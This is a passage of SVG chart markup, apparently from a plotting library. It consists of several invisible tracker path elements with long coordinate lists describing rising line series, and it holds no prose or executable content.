57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.71428571428572 L 173.81669637551994 253.29607830857194 L 175.79233511586455 252.42512790857194 L 177.76797385620918 252.42512790857194 L 179.74361259655382 252.42512790857194 L 181.71925133689842 252.42512790857194 L 183.69489007724306 252.42512790857194 L 185.67052881758767 251.66171177142908 L 187.6461675579323 250.58636012190482 L 189.6218062982769 249.66792568381032 L 191.59744503862154 247.8407768838103 L 193.57308377896615 246.76382063238174 L 195.5487225193108 245.49141304381067 L 197.52436125965542 243.22067469714472 L 199.50000000000003 240.62913549714472 L 201.47563874034466 237.07079264000186 L 203.45127748068927 234.76142432000188 L 205.4269162210339 232.557837942859 L 207.4025549613785 231.01424022857327 L 209.37819370172315 230.02149795047728 L 211.35383244206778 227.29883920762012 L 213.3294711824124 224.97638937904867 L 215.30510992275703 220.81527212190582 L 217.28074866310163 218.81052332190583 L 219.25638740344627 215.28957795047728 L 221.23202614379088 214.32932012190582 L 223.2076648841355 211.7686325790487 L 225.18330362448012 209.93235006476297 L 227.15894236482475 207.77176995047728 L 229.1345811051694 205.2708574933344 L 231.110219845514 203.6382568076201 L 233.08585858585863 201.44296857904868 L 235.06149732620324 200.10335715047728 L 237.03713606654787 199.01160428190582 L 239.01277480689248 199.01160428190582 L 240.98841354723712 198.43320505904887 L 242.96405228758175 197.69702768762028 L 244.93969102792636 195.97801980952494 L 246.915329768271 195.18307544381065 L 248.8909685086156 195.18307544381065 L 250.86660724896024 195.18307544381065 L 252.84224598930484 195.18307544381065 L 254.81788472964945 195.18307544381065 L 256.79352346999406 195.18307544381065 L 258.7691622103387 195.18307544381065 L 260.7448009506833 195.18307544381065 L 262.72043969102793 194.4906993066678 L 264.69607843137254 193.63136225523925 L 266.6717171717172 192.76221886476281 L 268.6473559120618 192.5944855314296 L 270.6229946524064 192.33164880762007 L 272.598633392751 191.77643737904867 L 274.5742721330957 191.39257273904872 L 276.5499108734403 189.08710710857213 L 278.5255496137849 184.33417590857212 L 280.50118835412957 179.33639012571464 L 282.4768270944742 178.88315492571462 L 284.4524658348188 178.88315492571462 L 286.4281045751634 178.88315492571462 L 288.40374331550805 178.88315492571462 L 290.37938205585266 178.88315492571462 L 292.35502079619727 178.88315492571462 L 294.33065953654193 178.88315492571462 L 296.30629827688654 178.88315492571462 L 298.28193701723114 178.88315492571462 L 300.25757575757575 178.88315492571462 L 302.2332144979204 178.88315492571462 L 304.208853238265 177.1467850971432 L 306.1844919786096 173.06024856380895 L 308.1601307189543 171.4390142780947 L 310.1357694592989 170.25361039238038 L 312.1114081996435 170.25361039238038 L 314.0870469399881 170.09957311999966 L 316.0626856803328 170.09957311999966 L 318.0383244206774 170.09957311999966 L 320.013963161022 170.09957311999966 L 321.98960190136665 170.09957311999966 L 323.96524064171126 170.09957311999966 L 325.94087938205587 170.09957311999966 L 327.9165181224005 169.15377700571395 L 329.89215686274514 167.15902454857113 L 331.86779560308975 165.98574820571397 L 333.84343434343435 164.51450980571397 L 335.81907308377896 161.6356645485711 L 337.7947118241236 160.45624831999967 L 339.77035056446823 159.91534975999966 L 341.74598930481284 159.1636044799995 L 343.7216280451575 154.9928460799995 L 345.6972667855021 154.34105407999948 L 347.6729055258467 152.28363419428518 L 349.6485442661913 150.20789613714234 L 351.624183006536 149.45157385142804 L 353.5998217468806 149.02352233142804 L 355.5754604872252 149.02352233142804 L 357.55109922756986 149.02352233142804 L 359.52673796791447 149.02352233142804 L 361.5023767082591 148.22896530285664 L 363.4780154486037 147.51893234285595 L 365.45365418894835 146.51879062857023 L 367.42929292929296 139.01554582857023 L 369.40493166963756 131.1252345142845 L 371.3805704099822 123.48944937142736 L 373.35620915032683 122.44409577142736 L 375.33184789067144 114.18356457142735 L 377.30748663101605 105.49689485714163 L 379.2831253713607 97.95655702857024 L 381.2587641117053 92.33018902857023 L 383.2344028520499 88.56856013714165 L 385.2100415923946 81.59222916571309 L 387.1856803327392 73.9680133942845 L 389.1613190730838 67.28380905142737 L 391.1369578134284 60.21492310857022 L 393.1125965537731 55.53465567999879 L 395.0882352941177 50.8868738285702 L 405.0882352941177 50.8868738285702" fill="none" isTracker="true" stroke-opacity="0.000001" stroke="rgb(192,192,192)" stroke-width="22" visibility="visible" zIndex="1" style=""></path><path d="M -6.088235294117647 253.71428571428572 L 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.67763809523802 L 75.03475935828877 253.67763809523802 L 77.0103980986334 253.67763809523802 L 78.98603683897802 253.67763809523802 L 80.96167557932264 253.67763809523802 L 82.93731431966727 253.67763809523802 L 84.91295306001189 253.67763809523802 L 86.88859180035651 253.67763809523802 L 88.86423054070113 253.67763809523802 L 90.83986928104575 253.67763809523802 L 92.81550802139039 253.67763809523802 L 94.791146761735 253.67763809523802 L 96.76678550207963 253.67763809523802 L 98.74242424242425 253.67763809523802 L 100.71806298276887 253.67763809523802 L 102.69370172311349 253.67763809523802 L 104.66934046345811 253.67763809523802 L 106.64497920380273 253.67763809523802 L 108.62061794414737 253.67763809523802 L 110.59625668449199 253.67763809523802 L 112.57189542483661 253.67763809523802 L 114.54753416518123 253.67763809523802 L 116.52317290552585 253.67763809523802 L 118.49881164587048 253.67763809523802 L 120.4744503862151 253.67763809523802 L 122.45008912655972 253.67763809523802 L 124.42572786690435 253.67763809523802 L 126.40136660724897 253.67763809523802 L 128.3770053475936 253.67763809523802 L 130.35264408793822 253.67763809523802 L 132.32828282828285 253.67763809523802 L 134.3039215686275 253.67763809523802 L 136.2795603089721 253.67763809523802 L 138.25519904931673 253.67763809523802 L 140.23083778966134 253.67763809523802 L 142.20647653000597 253.67763809523802 L 144.18211527035058 253.67763809523802 L 146.15775401069521 253.67763809523802 L 148.13339275103985 253.67763809523802 L 150.10903149138446 253.67763809523802 L 152.0846702317291 253.46096609523804 L 154.0603089720737 253.46096609523804 L 156.03594771241833 253.46096609523804 L 158.01158645276294 253.46096609523804 L 159.98722519310758 253.46096609523804 L 161.96286393345218 253.46096609523804 L 163.93850267379682 253.46096609523804 L 165.91414141414145 253.46096609523804 L 167.88978015448606 253.46096609523804 L 169.8654188948307 253.46096609523804 L 171.8410576351753 253.46096609523804 L 173.81669637551994 253.46096609523804 L 175.79233511586455 253.46096609523804 L 177.76797385620918 253.46096609523804 L 179.74361259655382 253.46096609523804 L 181.71925133689842 253.46096609523804 L 183.69489007724306 253.46096609523804 L 185.67052881758767 253.46096609523804 L 187.6461675579323 253.46096609523804 L 189.6218062982769 253.46096609523804 L 191.59744503862154 253.46096609523804 L 193.57308377896615 253.46096609523804 L 195.5487225193108 253.46096609523804 L 197.52436125965542 253.46096609523804 L 199.50000000000003 253.46096609523804 L 201.47563874034466 253.46096609523804 L 203.45127748068927 253.46096609523804 L 205.4269162210339 253.3409592380952 L 207.4025549613785 253.28743172571427 L 209.37819370172315 253.24724338285714 L 211.35383244206778 253.24724338285714 L 213.3294711824124 252.99474692571428 L 215.30510992275703 251.61509938285712 L 217.28074866310163 250.48982578285714 L 219.25638740344627 247.72474601142858 L 221.23202614379088 234.42478944 L 223.2076648841355 221.61171058285714 L 225.18330362448012 212.08829115428574 L 227.15894236482475 202.80387058285714 L 229.1345811051694 196.03578829714286 L 231.110219845514 187.72537686857143 L 233.08585858585863 176.89837344 L 235.06149732620324 171.01524658285715 L 237.03713606654787 169.62399922285715 L 239.01277480689248 169.62399922285715 L 240.98841354723712 169.5674119161904 L 242.96405228758175 168.62849991619038 L 244.93969102792636 168.62849991619038 L 246.915329768271 167.9460124342859 L 248.8909685086156 167.79926578285716 L 250.86660724896024 165.97237069714288 L 252.84224598930484 165.5128264685711 L 254.81788472964945 165.5128264685711 L 256.79352346999406 165.5128264685711 L 258.7691622103387 165.5128264685711 L 260.7448009506833 165.39585516190448 L 262.72043969102793 164.46915865904734 L 264.69607843137254 163.72828249904734 L 266.6717171717172 163.5307439390475 L 268.6473559120618 163.5307439390475 L 270.6229946524064 163.5307439390475 L 272.598633392751 163.5307439390475 L 274.5742721330957 163.5307439390475 L 276.5499108734403 163.5307439390475 L 278.5255496137849 163.5307439390475 L 280.50118835412957 163.5307439390475 L 282.4768270944742 163.5307439390475 L 284.4524658348188 163.5307439390475 L 286.4281045751634 163.5307439390475 L 288.40374331550805 163.5307439390475 L 290.37938205585266 163.5307439390475 L 292.35502079619727 163.50232793904752 L 294.33065953654193 161.72835765333323 L 296.30629827688654 161.1528829104761 L 298.28193701723114 158.30970988190467 L 300.25757575757575 155.5378813104761 L 302.2332144979204 151.96977045333324 L 304.208853238265 150.2266089752384 L 306.1844919786096 148.96361362285666 L 308.1601307189543 146.31711990857093 L 310.1357694592989 143.8973452799995 L 312.1114081996435 142.40965097142808 L 314.0870469399881 140.74403134476148 L 316.0626856803328 140.74403134476148 L 318.0383244206774 140.74403134476148 L 320.013963161022 140.74403134476148 L 321.98960190136665 140.74403134476148 L 323.96524064171126 140.74403134476148 L 325.94087938205587 140.74403134476148 L 327.9165181224005 138.7463865447615 L 329.89215686274514 136.84611728761863 L 331.86779560308975 135.05119020190435 L 333.84343434343435 134.13172963047577 L 335.81907308377896 133.22144336761863 L 337.7947118241236 132.39389164190382 L 339.77035056446823 131.7632582857133 L 341.74598930481284 130.97254023618973 L 343.7216280451575 129.97807326476112 L 345.6972667855021 129.4970456380945 L 347.6729055258467 128.3369624380945 L 349.6485442661913 127.31116175238074 L 351.624183006536 126.8695055085712 L 353.5998217468806 126.6549579428569 L 355.5754604872252 126.24255608380903 L 357.55109922756986 125.94201628952334 L 359.52673796791447 125.56161400380904 L 361.5023767082591 125.15929644190473 L 363.4780154486037 124.89065473523794 L 365.45365418894835 124.64328330666652 L 367.42929292929296 124.60776330666653 L 369.40493166963756 124.60776330666653 L 371.3805704099822 124.60776330666653 L 373.35620915032683 124.60776330666653 L 375.33184789067144 124.60776330666653 L 377.30748663101605 124.60776330666653 L 379.2831253713607 124.60776330666653 L 381.2587641117053 124.60776330666653 L 383.2344028520499 124.60776330666653 L 385.2100415923946 124.60776330666653 L 387.1856803327392 124.60776330666653 L 389.1613190730838 124.60776330666653 L 391.1369578134284 124.60776330666653 L 393.1125965537731 124.56621054476187 L 395.0882352941177 124.56621054476187 L 405.0882352941177 124.56621054476187" fill="none" isTracker="true" stroke-opacity="0.000001" stroke="rgb(192,192,192)" stroke-width="22" visibility="visible" zIndex="1" style=""></path><path d="M -6.088235294117647 253.71428571428572 L 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.0216457142857 L 88.86423054070113 252.3215465142857 L 90.83986928104575 246.49829622857143 L 92.81550802139039 245.70670765714286 L 94.791146761735 245.70670765714286 L 96.76678550207963 245.70670765714286 L 98.74242424242425 245.70670765714286 L 100.71806298276887 245.70670765714286 L 102.69370172311349 245.70670765714286 L 104.66934046345811 245.70670765714286 L 106.64497920380273 245.70670765714286 L 108.62061794414737 245.70670765714286 L 110.59625668449199 243.22411337142856 L 112.57189542483661 242.20494308571426 L 114.54753416518123 239.15245577142858 L 116.52317290552585 237.0699689142857 L 118.49881164587048 235.61512045714284 L 120.4744503862151 235.00985965714284 L 122.45008912655972 235.00985965714284 L 124.42572786690435 235.00985965714284 L 126.40136660724897 235.00985965714284 L 128.3770053475936 235.00985965714284 L 130.35264408793822 235.00985965714284 L 132.32828282828285 235.00985965714284 L 134.3039215686275 235.00985965714284 L 136.2795603089721 235.00985965714284 L 138.25519904931673 235.00985965714284 L 140.23083778966134 235.00985965714284 L 142.20647653000597 235.00985965714284 L 144.18211527035058 235.00985965714284 L 146.15775401069521 234.13251565714285 L 148.13339275103985 233.24842285714286 L 150.10903149138446 232.4887008 L 152.0846702317291 232.4887008 L 154.0603089720737 232.36306656 L 156.03594771241833 232.36306656 L 158.01158645276294 232.25004192 L 159.98722519310758 232.25004192 L 161.96286393345218 232.25004192 L 163.93850267379682 232.25004192 L 165.91414141414145 232.25004192 L 167.88978015448606 231.99744397714284 L 169.8654188948307 231.77402035809467 L 171.8410576351753 231.77402035809467 L 173.81669637551994 231.65858035809467 L 175.79233511586455 231.65858035809467 L 177.76797385620918 231.65858035809467 L 179.74361259655382 231.65858035809467 L 181.71925133689842 231.65858035809467 L 183.69489007724306 231.65858035809467 L 185.67052881758767 231.65858035809467 L 187.6461675579323 231.65858035809467 L 189.6218062982769 231.65858035809467 L 191.59744503862154 231.65858035809467 L 193.57308377896615 231.65858035809467 L 195.5487225193108 227.81364184380897 L 197.52436125965542 226.82232938666607 L 199.50000000000003 226.82232938666607 L 201.47563874034466 222.56943521523755 L 203.45127748068927 214.74925052952324 L 205.4269162210339 214.74925052952324 L 207.4025549613785 214.74925052952324 L 209.37819370172315 214.74925052952324 L 211.35383244206778 214.74925052952324 L 213.3294711824124 214.74925052952324 L 215.30510992275703 214.74925052952324 L 217.28074866310163 214.74925052952324 L 219.25638740344627 209.93832024380896 L 221.23202614379088 209.93832024380896 L 223.2076648841355 209.93832024380896 L 225.18330362448012 209.93832024380896 L 227.15894236482475 209.93832024380896 L 229.1345811051694 208.19327338666608 L 231.110219845514 208.19327338666608 L 233.08585858585863 208.19327338666608 L 235.06149732620324 208.19327338666608 L 237.03713606654787 208.19327338666608 L 239.01277480689248 208.19327338666608 L 240.98841354723712 200.0571129295232 L 242.96405228758175 187.5987773866661 L 244.93969102792636 174.19226081523752 L 246.915329768271 169.12101967238038 L 248.8909685086156 169.12101967238038 L 250.86660724896024 160.01013967238038 L 252.84224598930484 160.01013967238038 L 254.81788472964945 160.01013967238038 L 256.79352346999406 160.01013967238038 L 258.7691622103387 160.01013967238038 L 260.7448009506833 160.01013967238038 L 262.72043969102793 160.01013967238038 L 264.69607843137254 160.01013967238038 L 266.6717171717172 160.01013967238038 L 268.6473559120618 160.01013967238038 L 270.6229946524064 160.01013967238038 L 272.598633392751 159.50759932952323 L 274.5742721330957 159.50759932952323 L 276.5499108734403 159.50759932952323 L 278.5255496137849 159.50759932952323 L 280.50118835412957 159.50759932952323 L 282.4768270944742 159.50759932952323 L 284.4524658348188 159.50759932952323 L 286.4281045751634 159.50759932952323 L 288.40374331550805 159.50759932952323 L 290.37938205585266 159.50759932952323 L 292.35502079619727 159.50759932952323 L 294.33065953654193 159.50759932952323 L 296.30629827688654 159.50759932952323 L 298.28193701723114 159.50759932952323 L 300.25757575757575 159.50759932952323 L 302.2332144979204 159.50759932952323 L 304.208853238265 158.2384189866661 L 306.1844919786096 158.2384189866661 L 308.1601307189543 158.2384189866661 L 310.1357694592989 158.2384189866661 L 312.1114081996435 158.2384189866661 L 314.0870469399881 158.2384189866661 L 316.0626856803328 158.2384189866661 L 318.0383244206774 158.2384189866661 L 320.013963161022 158.2384189866661 L 321.98960190136665 158.2384189866661 L 323.96524064171126 158.2384189866661 L 325.94087938205587 158.2384189866661 L 327.9165181224005 158.2384189866661 L 329.89215686274514 158.2384189866661 L 331.86779560308975 158.2384189866661 L 333.84343434343435 158.2384189866661 L 335.81907308377896 158.2384189866661 L 337.7947118241236 158.2384189866661 L 339.77035056446823 158.2384189866661 L 341.74598930481284 158.1886909866661 L 343.7216280451575 158.1886909866661 L 345.6972667855021 158.1886909866661 L 347.6729055258467 158.1886909866661 L 349.6485442661913 158.1886909866661 L 351.624183006536 158.1886909866661 L 353.5998217468806 158.1886909866661 L 355.5754604872252 158.1886909866661 L 357.55109922756986 158.1886909866661 L 359.52673796791447 158.1886909866661 L 361.5023767082591 158.1886909866661 L 363.4780154486037 158.1886909866661 L 365.45365418894835 158.1886909866661 L 367.42929292929296 158.1886909866661 L 369.40493166963756 158.1886909866661 L 371.3805704099822 158.1886909866661 L 373.35620915032683 158.1886909866661 L 375.33184789067144 158.1886909866661 L 377.30748663101605 158.1886909866661 L 379.2831253713607 158.1886909866661 L 381.2587641117053 158.1886909866661 L 383.2344028520499 158.1886909866661 L 385.2100415923946 158.1886909866661 L 387.1856803327392 158.1886909866661 L 389.1613190730838 158.1886909866661 L 391.1369578134284 148.4569213866661 L 393.1125965537731 132.4217725866661 L 395.0882352941177 132.4217725866661 L 405.0882352941177 132.4217725866661" fill="none" isTracker="true" stroke-opacity="0.000001" stroke="rgb(192,192,192)" stroke-width="22" visibility="visible" zIndex="1" style=""></path><path d="M -6.088235294117647 253.71428571428572 L 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.70560868571428 L 86.88859180035651 253.70560868571428 L 88.86423054070113 253.70560868571428 L 90.83986928104575 253.70560868571428 L 92.81550802139039 253.70560868571428 L 94.791146761735 253.70560868571428 L 96.76678550207963 253.70560868571428 L 98.74242424242425 253.70560868571428 L 100.71806298276887 253.70560868571428 L 102.69370172311349 253.70560868571428 L 104.66934046345811 253.70560868571428 L 106.64497920380273 253.70560868571428 L 108.62061794414737 253.70560868571428 L 110.59625668449199 253.70560868571428 L 112.57189542483661 253.70560868571428 L 114.54753416518123 253.70560868571428 L 116.52317290552585 253.70560868571428 L 118.49881164587048 253.70560868571428 L 120.4744503862151 253.70560868571428 L 122.45008912655972 253.70560868571428 L 124.42572786690435 253.70560868571428 L 126.40136660724897 253.70560868571428 L 128.3770053475936 253.70560868571428 L 130.35264408793822 253.70560868571428 L 132.32828282828285 253.70560868571428 L 134.3039215686275 253.70560868571428 L 136.2795603089721 253.70560868571428 L 138.25519904931673 253.70560868571428 L 140.23083778966134 253.70560868571428 L 142.20647653000597 253.70560868571428 L 144.18211527035058 253.70560868571428 L 146.15775401069521 253.70560868571428 L 148.13339275103985 253.70560868571428 L 150.10903149138446 253.70560868571428 L 152.0846702317291 253.70560868571428 L 154.0603089720737 253.70560868571428 L 156.03594771241833 253.70560868571428 L 158.01158645276294 253.70560868571428 L 159.98722519310758 253.70560868571428 L 161.96286393345218 253.38745097142856 L 163.93850267379682 253.38745097142856 L 165.91414141414145 253.38745097142856 L 167.88978015448606 253.19834925714287 L 169.8654188948307 253.122624 L 171.8410576351753 253.122624 L 173.81669637551994 253.122624 L 175.79233511586455 253.122624 L 177.76797385620918 252.9761801142857 L 179.74361259655382 251.63063177142857 L 181.71925133689842 251.0025366857143 L 183.69489007724306 251.0025366857143 L 185.67052881758767 251.0025366857143 L 187.6461675579323 251.0025366857143 L 189.6218062982769 251.0025366857143 L 191.59744503862154 250.9618149790477 L 193.57308377896615 250.92497566476197 L 195.5487225193108 250.90413726476197 L 197.52436125965542 250.90413726476197 L 199.50000000000003 250.90413726476197 L 201.47563874034466 250.90413726476197 L 203.45127748068927 250.3603768076191 L 205.4269162210339 249.5360590933334 L 207.4025549613785 248.71270549333337 L 209.37819370172315 248.62111463619053 L 211.35383244206778 248.62111463619053 L 213.3294711824124 248.62111463619053 L 215.30510992275703 248.62111463619053 L 217.28074866310163 248.62111463619053 L 219.25638740344627 248.62111463619053 L 221.23202614379088 248.52932644571445 L 223.2076648841355 248.52932644571445 L 225.18330362448012 248.4526709028573 L 227.15894236482475 247.70860583619054 L 229.1345811051694 246.9261549257143 L 231.110219845514 246.78001549714287 L 233.08585858585863 246.75669633523805 L 235.06149732620324 246.0712110780952 L 237.03713606654787 245.4850295923809 L 239.01277480689248 245.4850295923809 L 240.98841354723712 245.4850295923809 L 242.96405228758175 245.44182712380945 L 244.93969102792636 245.44182712380945 L 246.915329768271 245.44182712380945 L 248.8909685086156 245.44182712380945 L 250.86660724896024 245.29335352380946 L 252.84224598930484 244.99737043809517 L 254.81788472964945 244.8720355809523 L 256.79352346999406 244.8720355809523 L 258.7691622103387 244.8720355809523 L 260.7448009506833 244.8720355809523 L 262.72043969102793 244.6001553523809 L 264.69607843137254 244.52977500952375 L 266.6717171717172 244.52977500952375 L 268.6473559120618 244.52977500952375 L 270.6229946524064 244.45442186666662 L 272.598633392751 244.45442186666662 L 274.5742721330957 244.45442186666662 L 276.5499108734403 244.45442186666662 L 278.5255496137849 244.45442186666662 L 280.50118835412957 244.45442186666662 L 282.4768270944742 244.45442186666662 L 284.4524658348188 244.2866659809523 L 286.4281045751634 244.2866659809523 L 288.40374331550805 244.20760860952376 L 290.37938205585266 244.20760860952376 L 292.35502079619727 243.95790300952376 L 294.33065953654193 243.90878392380947 L 296.30629827688654 243.86558145523804 L 298.28193701723114 243.64353183999984 L 300.25757575757575 243.64353183999984 L 302.2332144979204 241.8117146971427 L 304.208853238265 239.9702564114284 L 306.1844919786096 238.78632406857125 L 308.1601307189543 238.59877846857125 L 310.1357694592989 238.59877846857125 L 312.1114081996435 238.59877846857125 L 314.0870469399881 237.20659743999983 L 316.0626856803328 234.56492429714268 L 318.0383244206774 232.56342303999983 L 320.013963161022 230.73160589714269 L 321.98960190136665 230.4435894399998 L 323.96524064171126 230.2697748571427 L 325.94087938205587 228.47459405714267 L 327.9165181224005 226.89344662857124 L 329.89215686274514 226.62440799999982 L 331.86779560308975 226.45963579428553 L 333.84343434343435 226.38528735999984 L 335.81907308377896 226.31880294095214 L 337.7947118241236 226.2607531123807 L 339.77035056446823 226.06185238857125 L 341.74598930481284 225.37717337904732 L 343.7216280451575 224.0129516647616 L 345.6972667855021 222.2365964647616 L 347.6729055258467 219.91993132190447 L 349.6485442661913 214.04847532190445 L 351.624183006536 211.8126435504759 L 353.5998217468806 206.31465497904733 L 355.5754604872252 203.9548640457134 L 357.55109922756986 198.28291204573034 L 359.52673796791447 198.28291204573034 L 361.5023767082591 198.28291204573034 L 363.4780154486037 198.28291204573034 L 365.45365418894835 198.28291204573034 L 367.42929292929296 198.28291204573034 L 369.40493166963756 198.1325102171589 L 371.3805704099822 197.34386473144463 L 373.35620915032683 197.2302007314446 L 375.33184789067144 195.8052398171589 L 377.30748663101605 194.52296781715887 L 379.2831253713607 192.98616964573034 L 381.2587641117053 192.8242999314446 L 383.2344028520499 192.60024992001604 L 385.2100415923946 191.1540784914446 L 387.1856803327392 189.42252923430175 L 389.1613190730838 187.41717152001604 L 391.1369578134284 185.1187230628732 L 393.1125965537731 184.76018474668268 L 395.0882352941177 184.4768569295398 L 405.0882352941177 184.4768569295398" fill="none" isTracker="true" stroke-opacity="0.000001" stroke="rgb(192,192,192)" stroke-width="22" visibility="visible" zIndex="1" style=""></path><path d="M -6.088235294117647 253.71428571428572 L 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 